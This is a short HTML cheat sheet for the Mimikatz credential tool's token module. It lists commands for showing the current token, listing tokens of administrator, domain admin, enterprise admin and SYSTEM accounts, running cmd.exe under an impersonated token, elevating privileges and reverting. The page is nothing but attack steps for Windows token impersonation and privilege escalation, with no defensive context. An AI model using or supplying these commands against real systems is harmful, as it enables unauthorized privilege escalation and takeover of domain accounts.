<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Mimikatz - Tokens</title>
</head><body><b><u>Show who you are </u></b><br/>
<br/>
token::whoami<br/>
<br/>
<b><u>Show other tokens:</u></b><br/>
<br/>
token::list /user:administrator<br/>
token::list /user:domainadmin<br/>
token::list /user:enterpriseadmin<br/>
token::list /user:system\<br/>
token::list /user:bob123<br/>
<br/>
<b><u>Run process with a token:<br/>
<br/>
</u></b>token::run /process:cmd.exe<br/>
<br/>
<b><u>Get those privileges:<br/>
</u></b><br/>
token::elevate<br/>
<br/>
<b><u>Revert Token:<br/>
<br/>
</u></b>token::revert<br/>
<br/>
</body></html>